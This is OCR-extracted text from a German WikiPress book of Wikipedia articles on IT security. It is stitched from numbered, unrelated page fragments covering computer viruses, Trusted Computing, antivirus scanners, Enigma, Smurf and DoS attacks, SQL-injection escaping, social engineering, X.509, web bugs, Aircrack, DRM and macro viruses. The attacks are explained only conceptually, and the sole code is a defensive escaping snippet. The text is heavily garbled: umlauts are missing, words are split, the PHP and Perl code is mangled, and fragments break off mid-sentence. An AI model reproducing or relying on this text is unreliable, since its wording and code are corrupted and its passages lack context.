296. fizieren und hat eine Vorreiterrolle in der Ent wicklung neuer Viren Wieder einige Monate sp ter im Jahr 2005 wurde das erste Virus f r Handys mit dem Betriebssystem Symbian OS geschrieben Es kann nachdem vorher schon W rmer f r dieses Betriebssystem erschienen sind auch Dateien infizieren Mitte 2005 kurz nach der Ver ffentlichung der ersten Beta Version des XP Nachfolgers Microsoft Windows Vista wurde das erste Virus f r die Microsoft Command Shell Codename Monad ver ffentlicht Zun chst wurde propagiert dass es ein erstes Virus f r das neue Windows gebe Jedoch lie Microsoft nach Bekanntwerden der Viren verlautbaren dass Monad doch nicht wie geplant in Vista enthalten sein werde Somit w re dies ein Virus f r eine Betaversion mit extrem geringen Chancen auf Ver breitung Das erste wirkliche Computervirus f r MS Windows Vista trat einige Monate sp ter im Oktober 2005 auf MSIL Idoneus nutzt NET Frame work 2 0 um sich zu verbreiten In dieser Zeit wurden auch die ersten Viren f r Ruby und MenuetOS entdeckt die aber weder jetzt noch in Zu kunft eine Gefahr f r Anwender sein werden da diese Plattformen kaum verbreitet sind und sich die Viren daher kaum vermehren k nnen 43 Viren W rmer Trojaner Literatur Die meisten B cher zum Thema sind inzwischen veraltet und oder nicht mehr erh ltlich Auswahl Amberg Eric KnowWare 183 Sicherheit im Internet 2004 ISBN 87 91364 38 8 Brunnstein Klaus
297. fortf hrt Aufgrund der erheblichen pers nlichen Freiheitseinschr nkung durch die zentral gesteuerte berwachung der gesicherten Systeme und der M glichkeit einer u erst umfassenden Datensammlung ber Nutzungs gewohnheiten und der damit verbundenen Pers nlichkeitsrechtsverlet zungen gibt es weltweit starke Abneigungen gegen diese Gemeinschaft Sp testens seit der WinHEC 2005 gilt das darauf aufbauende Sicher heitskonzept Palladium von Microsoft als tot Von den Pl nen den Be nutzer in seiner Freiheit einzuschr nken ist nicht mehr viel brig geblie ben Literatur Kuhlmann Dirk Gehring Robert Trusted Platforms DRM and Beyond In Digital Rights Management Technological Economic Le gal and Political Aspects Springer Berlin Heidelberg New York 2003 S 178 205 ISBN 3 540 40465 1 Weblinks Offizielle Website der Trusted Computing Group TCG http www trustedcomputing org Quelle http de wikipedia org wiki Trusted_Computing_Platform_Alliance Historie 23 11 02 Angelegt von Igelball danach bearbeitet von den Hauptautoren Igelball Nerd Klaus Jesper Root axs Magnus Kurt Jansson Stefan K hn Smurf Snoyes Ben Zin Faraway Hoch auf einem Baum Kris Kaiser anonym 12 1 06 1 2 06 WikiPress Redaktion Trusted Computing Group Die Trusted Computing Group TCG ist die Nachfolgeorganisation der TCPA und hat somit die gleichen Ziele Es sollen Daten und Programme auf Computern vor Manipulationen g
298. ftware bildet ein privilegierter Kern mit dem Namen Ne xus der in der Hardware verankert wird Nexus l uft auf dem Ring 1 also auf einer anderen Ebene als die Ger tetreiber und Systemkomponenten Ring 0 113 Software Bisher ist nicht best tigt dass Palladium nur zertifizierte Treiber akzep tiert m glicherweise gilt das nur f r Nexus Der Codename Palladium wurde Anfang 2003 in Next Generation Se cure Computing Base for Windows NGSCB ge ndert da der bisherige Name tarnished getr bt ist Quelle http de wikipedia org wiki Palladium_ Software Historie 27 3 03 Anonym angelegt danach bearbeitet von den Hauptautoren IP X StephanKetz Steven Malkovich Zwobot MichaelDiederich Kubieziel anonym 12 1 06 1 2 06 WikiPress Redaktion Next Generation Secure Computing Base Die Next Generation Secure Computing Base NGSCB ist eine Sicher heitsinitiative von Microsoft die im Juni 2002 als Nachfolger von Palla dium ins Leben gerufen wurde Im Januar 2003 war der Name Palladium auf Grund des negativen Images bereits so sehr tarnished getr bt dass sich Microsoft aus Image gr nden f r diesen neuen Namen entschied Prinzipielle Grundidee Das Konzept der NGSCB das erstmals in der n chsten Windows Versi on Vista eingesetzt werden soll ergibt sich durch einen Kompromiss den Microsoft bereit ist einzugehen Zum einen soll Windows ein m glichst sicheres Betriebssystem werden zum anderen soll alte Softwar
299. g die nur durch eine anspruchsvolle Abwehr beantwortet werden kann Der Kauf einer Software ist kein Ersatz f r eine umsichtige Untersuchung der Risiken m glicher Verluste der Abwehr und Sicherheitsbestimmungen Ist einmal die Sicherheit eines Systems verletzt worden muss es als kompromittiert betrachtet werden was Ma nahmen zur Verhinderung weiterer Sch den und zur Datenrettung erfordert Bewertung und Zertifizierung Zur Bewertung und Zertifizierung der Sicherheit von Computersystemen existieren internationale Normen Wichtige Normen in diesem Zusam menhang sind vor allem die amerikanischen TCSEC und die europ i schen ITSEC Standards sowie der neuere Common Criteria Standard Die Zertifizierung erfolgt in Deutschland in der Regel durch das Bundes amt f r Sicherheit in der Informationstechnik Literatur Eckert Claudia IT Sicherheit 3 Auflage 2004 Oldenbourg ISBN 3 486 20000 3 Hacker s Guide Markt und Technik ISBN 3 8272 6522 3 13 berblick Hacking Intern Data Becker ISBN 3 8158 2284 X M ller Klaus Rainer IT Sicherheit mit System 2 Auflage 2005 VIEWEG ISBN 3 528 15838 7 M ller Klaus Rainer Handbuch Unternehmenssicherheit 2005 VIEWEG ISBN 3 528 05889 7 Schneier Bruce Angewandte Kryptographie Addison Wesley ISBN 3 89319 854 7 Schneier Bruce Secrets amp Lies IT Sicherheit in einer vernetzten Welt Broschiert 2004 dpunkt Verlag ISBN 3 89864 302 6 Schneier Bruce Beyond Fe
300. g nge wesentlich seltener vorkommen als Lesevorg nge bevorzugen viele Be nutzer diese Einstellung Sie sorgt daf r dass die zus tzliche Belastung des Computers durch den Echtzeitscanner vermindert wird und verhin dert zugleich dass sich das Computersystem infiziert Allerdings kann der alleinige Einsatz dieser Strategie auf Kosten der Sicherheit gehen Greift man etwa ber eine Dateifreigabe auf eine Datei zu die virulent ist kann diese dann ungehindert das System infizieren Um die Belastung durch den Echtzeitscanner weiter zu verringern werden oft einige Dateiformate Archive oder hnliches nur zum Teil oder gar nicht gescannt Daher sollte trotz eines Echtzeitschutzes regelm Big ein manueller Scan durchgef hrt werden Findet der Echtzeitscanner etwas Verd chtiges fragt er in der Regel den Benutzer nach dem weiteren Vorgehen Dies sind das L schen der Datei das Verschieben in die Qua rant ne oder wenn m glich ein Reperaturversuch On Demand Scan Der manuelle Scanner engl On Demand Scan auch als Dateiscanner bezeichnet muss vom Benutzer von Hand gestar tet werden On Demand Findet ein Scanner dann sch dliche Software gibt es in den meisten F llen eine Warnung mit Optionen zur Reinigung Reparatur Quarant ne oder L schung der befallenen Dateien Der Fest plattenscan sollte regelm ig ausgef hrt werden Die meisten Programme bieten daf r bestimmte Assistenten an die den Rechner z B einmal pro Woche du
301. g vom Thema oder davon ob er als gedrucktes Buch ver ffentlicht wird oder nicht Wir empfehlen diese Lizenz prinzipiell f r Werke die als Anleitungen oder Referenzen dienen sollen 1 ANWENDBARKEIT UND DEFINITIONEN Diese Lizenz kann auf jedes Handbuch oder jedes andere Werk angewendet werden in welchem Medium auch immer sofern es einen Hinweis des Rechteinhabers enth lt der besagt dass das Werk unter den Bedingungen dieser Lizenz verbreitet werden darf Ein solcher Hinweis gew hrt eine weltweit g ltige geb hrenfreie und zeitlich unbefristete Lizenz die es gestattet das Werk unter den hier festgelegten Bedingungen zu nutzen Der Begriff Dokument wird im Folgenden f r ein jedes solches Handbuch oder Werk verwendet Jede Person kann Lizenznehmer sein und wird im Folgenden mit Sie angesprochen Sie akzeptieren die Lizenz wenn Sie ein Dokument derart vervielf ltigen ver ndern oder verbreiten dass Sie laut geltender Copyright Gesetze eine Genehmigung daf r ben tigen Eine modifizierte Version des Dokuments ist ein Werk das das Dokument als Ganzes oder in Teilen enth lt sei es unver ndert kopiert mit nderungen versehen und oder in eine andere Sprache bersetzt Ein sekund rer Abschnitt ist ein eigens genannter Anhang oder ein das Dokument einleitender Abschnitt der sich ausschlie lich mit dem Verh ltnis des Autors oder Herausgebers des Dokuments zum eigentlichen Thema des Dokuments oder damit zusammenh ngend
302. gen erbeutet werden als das U Boot U 505 erfolgreich aufgebracht wurde Gegen Ende des Krieges waren die Alliierten in der Lage gro e Teile des deutschen Funkverkehrs zu entschl sseln Unentschl sselt blieben ei nige selten genutzte oder als weniger interessant erachtete Codes sowie aus verschiedenen Gr nden ein kleiner Teil von Nachrichten mit prinzipiell geknackten Codes Geschichtliche Konsequenzen Allgemein wird die Kompromittierung des Enigma Codes als einer der strategischen Vorteile angesehen der ma geblich zum Gewinn des Krie ges durch die Alliierten gef hrt hat Es gibt Historiker die vermuten dass der Bruch der Enigma den Krieg um etliche Monate vielleicht sogar um ein volles Jahr verk rzt hat Der Historiker Rohwer sch tzt den Wert der Enigma Nachrichten auf 400 nichtversenkte alliierte Schiffe wovon 300 bereits bei der Operation Overlord gefehlt h tten Wenn man noch weiter spekulieren m chte kann man aus den Aus sagen von Gordon Welchman der neben Alan Turing einer der f hren den K pfe der britischen Codeknacker in Bletchley Park war Schluss folgerungen ziehen In seinem Buch The Hut Six Story beschreibt er die Gratwanderung die die alliierten Codeknacker zu vollbringen hatten um nicht den Anschluss an die immer wieder von den Deutschen neu eingef hrten kryptografischen Komplikationen zu verlieren Mehrfach stand die Entzifferungsf higkeit auf des Messers Schneide und immer wieder senkte sich die Waagsch
303. gen helfen keine Paketfilter und auch keine Personal Firewalls Entweder man ver wendet eine solche Anwendung einfach nicht oder man versucht durch Patches diese L cken zu schlie en Die zweite Klasse von Anwendungen Server Anwendungen oder auch Dienste warten auf Anfragen ber das Netzwerk Jeder Fremde kann Da ten an diese Anwendungen per Netzwerk Internet schicken Somit steigt das Risiko infiziert zu werden wenn Sicherheitsl cken in solchen An wendungen existieren Windows beispielsweise startet eine Vielzahl von zumeist unn tigen Server Anwendungen schon beim Systemstart Meh rere W rmer hatten so bereits leichtes Spiel als Sicherheitsl cken in die sen Server Anwendungen bekannt wurden notwendig ist diese sicher heitskritische Standard Konfiguration von Windows nicht Sch tzen kann man sich vor Sicherheitsl cken in Server Anwendungen durch rechtzeitiges Einspielen von Patches durch Beenden oder Umkon figurieren der Server Anwendung so dass keine Anfragen mehr ber das 56 Computerwurm Netzwerk angenommen werden oder durch das Dazwischenschalten von Paketfiltern die riskante Anfragen an Server Anwendungen ausfiltern Schutz vor Social Engineering Technisch kann man sich nicht vor Social Engineering sch tzen man ist darauf angewiesen seinen Verstand zu gebrauchen und stets kritisch zu sein Gegen die Verbreitung durch E Mails ist der sicherste Schutz der ver antwortungsvolle Umgang mit E Mails und der
304. gen und die bertragenen Daten daraus rekonstruiert Zeitschriften Datenschleuder das Fachmagazin des Chaos Computer Clubs CCC Phrack Magazin ein rein elektronisches Magazin TAP und 2600 magazine sind US amerikanische Magazine Quelle http de wikipedia org wiki Phreaking Historie 20 3 04 Anonym angelegt danach bearbeitet von den Hauptautoren Skriptor Evr JunK Siehe auch L scher Caliga Markus Schwei Jailbird Sansculotte Steven Malkovich Kju Fake kevin Sturmbringer W lkchen Parzi anonym 12 1 06 1 2 06 WikiPress Redaktion 214 SQL Injektion Smurf Attacke Als Smurf Attacke bezeichnet man eine besondere Art eines Angriffs auf ein Computersystem oder netzwerk Bei einem Smurf Angriff sendet ein Angreifer ICMP Echo Requests Pings mit der Absender Adresse des Opfers an die Broadcast Adresse eines Routers Je nach seiner Konfiguration leitet der Router diese Anfrage in das innere Netz weiter Das hat zur Folge dass alle angeschlossenen Cli ents dem Opfer auf die vermeintliche Anfrage antworten Je nach Anzahl der Clients kann der Angreifer auf diese Art mit nur einem ICMP Paket eine hohe Anzahl von Antworten an das Opfer erzeugen Router die durch ihre Konfiguration einen solchen Angriff erm gli chen werden Smurf Amplifier genannt Nutzt der Angreifer beispielsweise seine 1Mbit Leitung aus und sendet Pings an einen Amplifier an den 1000 Clients angeschlossen sind so wird das Opfer mit einem Stream von
305. gentlichen Ort des 208 Denial of Service Geschehens abgelenkt ist bzw die Angriffsversuche im durch den DoS erh hten Datenaufkommen untergehen Verz gert man Antworten eines regul ren Systems k nnen Anfragen an dieses durch eigene gef lschte Antworten kompromittiert werden Beispiel hierf r ist die bernahme fremder Domainnamen durch Liefern gef lschter DNS Antworten Als Form des Protests sind DoS Attacken in letzter Zeit popul r ge worden Zum Eigenschutz der Protestierenden werden Angriffe dieser Art im Allgemeinen von Computerwiirmern durchgef hrt die sich selbstst ndig auf fremden Systemen verbreiten Entsprechend handelt es sich bei Protestaktionen dieser Art um DDoS Attacken Angriffskonzepte Je nachdem welche Ressource durch den Angriff blockiert werden soll lassen sich folgende Konzepte unterscheiden Angriffe die auf die Belegung von Bandbreite zielen Durch m glichst datenintensive Zugriffe auf das Zielsystem soll dessen Netzwerkan bindung berlastet werden Der Angreifer muss hierzu jedoch selbst ber eine gute Anbindung verf gen oder aber ber ein Netzwerk von Zombierechnern die ihre Bandbreite geb ndelt einsetzen k nnen DDoS Attacke Angriffe die auf die Belegung von Netzwerkressourcen zielen Durch unvollst ndige oder fehlerhafte Verbindungsanfragen in gro er Zahl wird gezielt versucht die Netzwerkf higkeit des angegriffenen Systems zu blockieren z B SYN Flood Attacke Angri
306. ger LuckyBoy7 LuckyStarr LudiKalell Lukas Graf Lukian Lukrez Lustiger seth LutzPrechelt Lynax Lyzzy M rossberg M5 MA5 Mac MadMax Madzero Magnummandel Mag nus Magnus Manske Mahaccc Maixdorff MAK Makaveli MaKoLine Malte Hangsleben Manja Marc Layer Marc van Woerkom Marcel Dunkelberg MarcelBraetz Marco Bockelbrink MarcoBorn Marilyn hanson Mario Mlynek Mario23 Mark Reiche MarkGGN Marko Kaiser Marko Kovacic Marko wiki Markobr Markus Schwei MarkusHagenlocher MarkusSchlichting MarkusWinkler Marokus Marsupilami Marti7D3 Martin Aggel Martin k Martin M ller Martin Otten Martin k MartinC Martin vogel Martiz Marton Masiat Masterchief MasterLR Mathias Fischer Mathias Jeschke Mathias Schindler Matt1971 Matth us Wander Matthias Bock Matthyk Matze6587 Mau riceKA Maverick1976 Max Plenert Maxberger Maynard MBq Mc005 Mcp Mdangers MDKiller Media lib Mega Melancholie MelancholieBot Meph666 Merkel Merren Methusalix Metoc Mez zofortist Mfaist MFM MGla Miaow Miaow MiB Mic r Miccom Micha koller Micha99 Michael Kiimmling Michael Scholz Michael Strunck Michael Zeilfelder Michael chlistalla MichaelDiede rich MichaelHartnick Michaelsy MichiK MIGNON Mijobe Mikano Mike Kr ger Mikue Mi lesTeg Mino Mirko b Misery Mistmano Mistral Mitch MJHa Mjk MKI Mkleine Mkogler MlaWU Mm freak Mmwiki Mnh Moewe Molily Momo Mononoke Montauk MontyM Moolsan MoOnShIn3
307. gt aus den kommenden berlegungen Sei G x das CRC Polynom Generatorpolynom und T x die Polynom darstellung der um den CRC Wert erweiterten zu bertragenden Bitfolge Wenn ein Fehler bei der bertragung auftritt kommt in Polynomdarstel lung beim Empf nger nicht T x sondern T x E x an Die zu E x ge h rende Bitfolge hat an jeder Bitposition die bei der zu bertragenden Bit folge invertiert bzw verf lscht wurde eine 1 Wenn der Empf nger die um den CRC Wert erweiterte Bitfolge erh lt berechnet er T x E x G x Da T x G x 0 per Definition von T x ist das Ergebnis E x G x 263 WLAN Wenn ein Einbitfehler aufgetreten ist gilt E x x wobei i bestimmt wel ches Bit invertiert ist Wenn nun G x zwei oder mehr Terme enth lt wird G x niemals E x teilen Sind zwei isolierte Einbitfehler aufgetreten gilt E x x x wobei i gt j Klammert man x aus l sst sich dies auch als E x x 1 schreiben Angenommen G x ist nicht durch x teilbar z B wenn G x x enth lt reicht es zu fordern dass G x nicht x 1 teilt f r alle k bis zum maxi malen Wert von j i d h der maximalen Rahmenl nge Einfache Po lynome geringen Grades die eine sichere bertragung f r lange Rahmen erm glichen sind bekannt Zum Beispiel teilt x x 1 den Term x 1 nicht f r jedes k kleiner 32768 Ist eine ungerade Anzahl von Bits verf lscht enth t E x eine ungerade Anzahl von
308. haftsunternehmen Daneben regeln die Landesdatenschutz gesetze der Bundesl nder den Datenschutz in Landes und Kommunal beh rden Neben diesen allgemeinen Datenschutzgesetzen gibt es eine Vielzahl bereichsspezifischer Datenschutzregelungen So gelten f r die Sozialleis tungstr ger die Datenschutz Sonderregelungen des Sozialgesetzbuchs insbesondere das zweite Kapitel des Zehnten Buchs Sozialgesetzbuch Die bereichsspezifischen Datenschutzbestimmungen gehen den Regelungen des allgemeinen Datenschutzrechts vor Die ffentlichen Stellen des Bundes sowie die Unternehmen die ge sch ftsm ig Telekommunikations oder Postdienstleistungen erbringen unterliegen der Aufsicht durch den Bundesbeauftragten f r den Daten schutz Die Landesbeh rden werden durch die Landesdatenschutzbeauf tragten kontrolliert Die privaten Unternehmen bis auf Telekommunika tion und Post unterliegen der Aufsicht der Datenschutzaufsichtsbeh rden f r den nicht 6ffentlichen Bereich die beim Landesdatenschutzbeauftrag ten oder bei den Landesbeh rden z B Innenministerium angesiedelt sind Die EU Kommission hat ein Vertragsverletzungsverfahren gegen die Bundesrepublik Deutschland eingeleitet da einige Landesdatenschutzbe auftragte und alle Landesbeh rden nicht in v lliger Unabh ngigkeit ar beiten sondern die Landesregierung weisungsbefugt ist sterreich Rechtsgrundlage f r den Datenschutz ist in sterreich das Datenschutzgesetz 2000 DSG 2000
309. haltung viel f ltiger Regeln man kann dabei sehr viel falsch machen Beschwerden an die Newsprovider der Spammer k nnen bewirken dass diesen die Nutzungsm glichkeit des jeweiligen Newsservers ent zogen wird Sehr selten werden Newsprovider die auf Beschwerden nicht reagieren mit einem Usenet Death Penalty UDP belegt welches in zwei Formen geschehen kann Passives UDP Die Administratoren der wichtigsten Newsserver ei nigen sich darauf dass alle Usenet Artikel die ber die Newsserver des schwarzen Schafes gelaufen sind nicht weitergeleitet werden und damit verschwinden Aktives UDP Die Spam Canceller verst ndigen sich darauf alle Artikel die von den Newsservern des schwarzen Schafes aus ins Usenet gelangt sind zu canceln so als seien sie Spam Newsgroups die sex in ihrem Namen tragen lassen sich umbenen nen Dies ist sehr erfolgreich mit der ehemaligen Newsgroup de talk sex geschehen die heute de talk liebesakt hei t und damit kaum noch Spam anlockt 191 Sonstige Themen NoCeM als Alternative zum Canceln W hrend das Canceln erfor dert jedem einzelnen Spam Artikel eine eigene Cancel Message hinterherzuschicken kommt dieses Verfahren mit Steuernachrich ten aus die gleich ganze Listen von Spam Artikeln enthalten Diese NoCeM Steuernachrichten werden allerdings nur von speziellen Cli ents verstanden die nicht besonders weit verbreitet sind und sind im Gegensatz zu Cancel Me
310. he nicht selber programmierte Scripte eigenst ndig ber Funktio nen wie addslashes oder das bereits weiter oben genannte mysql_real_ escape_string escapen d h dass bereits allen relevanten Zeichen in den Benutzereingaben durch magic_quotes ein Backslash vorangestellt wurde und nun durch die Escape Funktion erneut ein Backslash vorangestellt wird Somit verf lscht man die Benutzereingaben und erh lt anstatt einem einfachen Anf hrungszeichen ein Anf hrungszeichen mit vorangestell 220 SQL Injektion tem Backslash zur ck Die folgende Funktion erkennt selbstst ndig ob die magic_quotes aktiviert sind und verf hrt dementsprechend function quotesqlvar value Stripslashes if quoted if get magic _ quotes gpc value stripslashes value Quote if not integer if is _numeric value value mysql _ real _ escape string value return Svalue Auf den ersten Blick scheint es hier von Vorteil zu sein dass in einem Aufruf von mysql_query lediglich ein SQL Statement ausgef hrt wird Allerdings kann ein Angreifer das UNION Schl sselwort verwenden um weitere SQL Statements bei MySQL sogar UPDATE und DELETE ein zuschleusen Perl Das datenbankunabh ngige Datenbankmodul DBI unterst tzt eine hnliche prepare Syntax die auch im Java Beispiel zu sehen ist Sstatementhandle Sdatabasehandle gt prepare SELECT spaltel FROM tabelle WHERE spalte2 Sreturn
311. heim nistr ger verschaffen sie ihm dann den Eindruck dass es sich angesichts der Detailkenntnis bei dem eigentlich Fremden ja keinesfalls um einen Au enstehenden handeln kann Eine andere Masche besteht darin einen technischen Laien durch Fachjargon zu verwirren und zu verunsichern bis dieser in seiner Hilflosigkeit die n tigen Daten herausr ckt Ein klassisches Social Engineering ist im James Bond Film Diaman tenfieber dargestellt Dort fragt James Bond zun chst den untergeordne ten Kontrolleur der Strahlungsplaketten aus um dann in dessen Rolle ins geheime Raumfahrtlabor vorzudringen Social Engineering wurde in der Zeit vor dem Durchbruch des Inter nets in den 1980er und Anfang der 1990er Jahre des 20 Jahrhunderts von so genannten Phreakern benutzt um kostenlos Modemverbindun gen herzustellen Der Betreffende rief beispielsweise bei einem Mitarbeiter einer Firma an und gab vor Systemadministrator der Telefongesellschaft zu sein Leider habe man das Zugangspasswort zur cksetzen m ssen und wolle nun ein neues haben In den meisten F llen wurde das Passwort sorglos herausgegeben ffentlich bekannt wurde die Methode vor allem durch den Hacker Kevin Mitnick der durch seine Einbr che in fremde Computer eine der meistgesuchten Personen der USA war Bei der Aufdeckung seines Vorge hens wurde gezeigt dass Social Engineering meist schneller zum Ziel f hrt als etwa das Durchprobieren von Passw rtern genannt brute force A
312. hergestellt wodurch diese die meistgebaute unter den ffentlich bekannten amerika nischen Verschl sselungsmaschinen im Zweiten Weltkrieg wurde Durch auf einen Stangenkorb steckbare Reiter wurde der Schl ssel eingegeben 101 405 950 unterschiedliche Kombinationen waren m glich Da die M 209 nur das Verschl sseln von alphabetischen Zeichen vorsah mussten Zahlen immer in W rtern ausgedr ckt werden hier lag der An satzpunkt der deutschen Kryptoanalysten Das Entschl sseln der Funk spr che dauerte zun chst bis zu einer Woche konnte jedoch durch eine von den Deutschen gebaute Entschl sselungsmaschine die im September 1944 fertig gestellt wurde auf sieben Stunden beschleunigt werden Diese Entschl sselungsmaschine enthielt vier Walzen mit je 26 Schlit zen sowie gestanzte Blechplatten und zahlreiche verl tete Kabelverbin dungen Die Maschine bestand aus zwei Teilen einem Kasten in der Gr e eines Schreibtisches der die Relais und die vier Drehwalzen enthielt sowie einem weiteren Kasten mit 80 x 80 x 40 cm Kantenl nge Letzte rer enthielt 26 mal 16 Birnenfassungen mit denen sich durch Birnen die Buchstaben der relativen Einstellung nachbilden lie en Die entschl sselten M 209 Nachrichten enthielten teilweise brisante In formationen und Hinweise auf bevorstehende Bombardierungen deutscher St dte die meist etwa sechs bis acht Wochen vor der Durchf hrung in Funk spr chen angek ndigt wurden Ob und wie diese entschl s
313. hl eine spezielle Firma sein z B VeriSign oder eine Institution innerhalb einer Firma die einen eigenen Server installiert hat ein Beispiel hierf r ist der Microsoft Certificate Ser 149 PGP und Zertfikate ver Auch ffentliche Organisationen oder Regierungsstellen k nnen als Zertifizierungsstelle dienen Quelle http de wikipedia org wiki Zertifizierungsstelle Historie 29 8 04 Anonym angelegt danach bearbeitet von den Hauptautoren Duesentrieb Pit72 Habakuk anonym 12 1 06 1 2 06 WikiPress Redaktion X 509 X 509 ist ein ITU T Standard f r eine Public Key Infrastruktur und derzeit der wichtigste Standard f r digitale Zertifikate Die aktuelle Ver sion ist X 509v3 Geschichte X 509 wurde erstmals 1988 ver ffentlicht Die Entwicklung von X 509 begann in Verbindung mit dem X 500 Standard der nie vollst ndig implementiert wurde und setzt ein striktes hierarchisches System von vertrauensw rdigen Zertifizierungsstellen engl certificate authori ty CA voraus die Zertifikate erteilen k nnen Dieses Prinzip steht im Kontrast mit dem Web of Trust Modell bei dem jeder ein Zertifikat unterschreiben und damit seine Echtheit beglaubigen kann z B bei PGP Version 3 von X 509 X 509v3 beinhaltet die Flexibilit t mit Profilen erweitert zu werden Das wichtigste Profil entwickelte die IETF im Zu sammenhang des PKIX Standards Der Begriff X 509 Zertifikat bezieht sich meist auf das IETF Profil des X
314. hren be H 3 zeichnet Bei diesem Verfahren be Klar Gana sitzt der Anwender zwei Schliissel Verschl sselung text text einen ffentlichen und einen gehei men Schl ssel Beide Schl ssel er Abb 31 Verschl sselung mit ffentlichem f llen bestimmte Aufgaben Schl ssel 277 Kryptografie Der ffentliche Schl ssel wird wie der Name sagt ffentlich gemacht Je der andere Anwender kann diesen Schl ssel benutzen um an den Eigen t mer eine verschl sselte Nachricht zu senden Der geheime Schl ssel wird vom Besitzer geheim gehalten Er dient dazu an ihn gesendete verschl sselte Nachrichten zu entschl sseln siehe Abb 34 beim symmetrischen Kryptosystem Je nach verwendetem Schl ssel entstehen bei der Verschl sselung der selben Daten unterschiedliche verschl sselte Daten Sei zum Beispiel T ein zu verschl sselnder Text Verschl sselung mit geheimem Schl ssel ergibt verschl sselten Text VT reim ffentlichem Schl ssel ergibt VT wich VT ist im Allgemeinen verschieden von VT senp Nur bei u erst schlechter Wahl der Schl ssel k nnen beide verschl sselten Texte gleich sein Die Dechiffrierung kann jeweils nur mit dem Gegenst ck erfolgen Weder kann VT mit dem geheimen Schl ssel dechiffriert werden noch kann VT renun mit dem ffentlichen Schl ssel dechiffriert werden Diese Tatsache wird bei der elektronischen Unterschrift genutzt da nur der Besitzer des geheimen Schl ssels einen Hash Wert
315. http www ccc de Quelle http de wikipedia org wiki Chaos_Computer_Club Historie 2 10 02 Anonym angelegt danach bearbeitet von den Hauptautoren Pylon Tim Pritlove Steven Malkovich Elian TorsTen Daniel Kurt Jansson Grotej Diddi Bdk Echoray Blubbalutsch Hagbard Paul Ebermann Duesentrieb Magnus Herr Th Mahaccc Anathema Patrick Permien Kku JakobVoss KaerF Gunfighter 6 Skyman gozilla APPER anonym 12 1 06 1 2 06 WikiPress Redaktion Web Bug Als Web Bugs deutsch Web Wanzen auch Z hlpixel bezeichnet man kleine Grafiken in HTML E Mails oder auf Webseiten die eine Logfile Aufzeichnung und eine Logfile Analyse erm glichen Die meist nur 1 mal 1 Pixel gro en Bilder sind h ufig auch transparent damit sie nicht auffallen Wird ein Dokument ge ffnet dann muss dieses kleine Bild von einem Server im Internet geladen werden wobei dieser Download dort registriert wird So kann der Betreiber des Servers sehen wann und wie viele Nutzer diesen Web Bug brauchten bzw ob und wann eine E Mail ge ffnet oder eine Webseite besucht wurde Private Betreiber einer Webseite k nnen durch das Einbinden eines kostenlosen Web Bugs ohne Zugriff auf die Logfiles des Servers Informa tionen ber die Besucher erhalten So werden auf zahlreichen Internet seiten Z hler Counter verwendet die auf demselben Prinzip aufbauen aber bei jedem neuen Besucher ein neues Bild d h eine um eins erh hte Zahl darbieten Versend
316. i chen in mit WEP Wired Equivalent Privacy oder WPA Wi Fi Pro tected Access gesch tzte Wireless LANs einzudringen Das Programm Airodump schneidet gesendete Datenpakete mit und analysiert die zu jedem Paket geh renden 24 Bit langen Initialisierungs vektoren IVs Mit gen gend vielen mitgeschnittenen Paketen bzw schwachen IVs kann das Programm Aircrack auf den WEP Schl ssel schlie en Je nach L nge des verwendeten Schl ssels braucht man 100 000 bis 250 000 IVs bei 64 Bit Schl sseln oder 500 000 bis 1 000 000 IVs bei 128 Bit Schl sseln Aircrack ist im Sourcecode erh ltlich und l uft unter Windows und Linux Unter Windows werden zus tzliche Treiber ben tigt die Aircrack nicht beiliegen Diese Treiber genauer die Dateien peek5 sys und peek dll liefert der Hersteller von WLAN Software WildPackets in seiner Software Airopeek mit Ein vergleichbares Programm ist Airsnort Quelle http de wikipedia org wiki Aircrack Historie 24 1 05 Anonym angelegt danach bearbeitet von den Hauptautoren Sven423 Lentando MichiK Frubi anonym 12 1 06 1 2 06 WikiPress Redaktion 255 WLAN Virtual Private Network Ein Virtual Private Network VPN dt Virtuelles Privates Netzwerk ist ein Computernetz das zum Transport privater Daten ein ffentliches Netz zum Beispiel das Internet nutzt Teilnehmer eines VPN k nnen Daten wie in einem internen LAN austauschen Die einzelnen Teilnehmer m ssen hierzu nicht
317. ibler Formate auftreten Kundenbindung vs Freier Markt Der K ufer von z B Festplatten Musikabspielern kann wegen DRM Restriktionen nicht frei w hlen wo er seine Musik einkauft da sein Player nicht die DRMS unterst tzt die ihre Anbieter nicht freigeben So bindet der Marktf hrer im Online Musikhandel der nebenbei auch Marktf hrer f r Festplatten Musikabspielger te ist seine Kunden an sein System DRM gewinnt in der Praxis mehr Bedeutung als k nstli che Konsum Leitplanke denn als Mittel um die Rechte von K nstlern zu wahren Datenschutz Aus der Verkn pfung von Technik und Anwendungsebene resultieren bei DRM Systemen eine gro e Anzahl an noch offenen Fragen So las sen sich durch die zentrale Verwaltung von Schl sseln und eindeutigen Ger te IDs Benutzerprofile erstellen Zum Beispiel gibt es DRM Sys teme die bei jeder Benutzung des Mediums bei einer zentralen Stelle anfragen ob der betreffende Benutzer dies berhaupt darf DIVX in den USA ein DVD Miet System Information k nnte verloren gehen Zus tzlich betonen Kritiker dass durch kritische Ver nderungen des Inhalteanbietermarktes Firmen bernahmen aufgaben Insolvenz bei DRM Systemen nicht gesichert ist dass sich DRM gesch tzte Me dien auch in Zukunft abspielen lassen hnlich der fehlenden Unter 131 Software st tzung von Software heute nicht mehr existierender Hersteller Bei einer hohen Marktdurchdringung von DRM Systemen h tte der Fort bestand vo
318. ich in eine bestehende Programmfunktion ein Makroviren Makroviren ben tigen Anwendungen die Dokumente mit eingebetteten Makros verarbeiten Sie befallen Makros in nicht infizier ten Dokumenten oder f gen entsprechende Makros ein falls diese noch nicht vorhanden sind Makros werden von den meisten Office Dokument Typen verwendet wie z B in allen Microsoft Office sowie OpenOffice Dokumenten Aber auch andere Dokument Dateien k nnen Makros enthalten Sie dienen normalerweise dazu in den Dokumenten wiederkehrende Aufgaben zu automatisieren oder zu vereinfachen H ufig unterst tzen Anwendungen mit solchen Dokumenten ein spezi elles Makro das automatisch nach dem Laden des Dokuments ausgef hrt wird Dies ist ein von Makroviren bevorzugter Ort f r die Infektion da er die h chste Aufruf Wahrscheinlichkeit hat Wie Linkviren versuchen auch Makroviren noch nicht infizierte Dateien zu befallen Da die meisten Anwender sich nicht bewusst sind dass z B ein Textdo kument ausf hrbare Inhalte und damit ein Virus enthalten kann gehen sie meist relativ sorglos mit solchen Dokumenten um Sie werden sehr oft an andere Anwender verschickt oder sogar auf ffentlichen Servern zum Herunterladen angeboten Dadurch k nnen sich Makroviren recht gut verbreiten Um das Jahr 2000 herum stellten sie die gr te Bedrohung dar bis sie darin von den Computerw 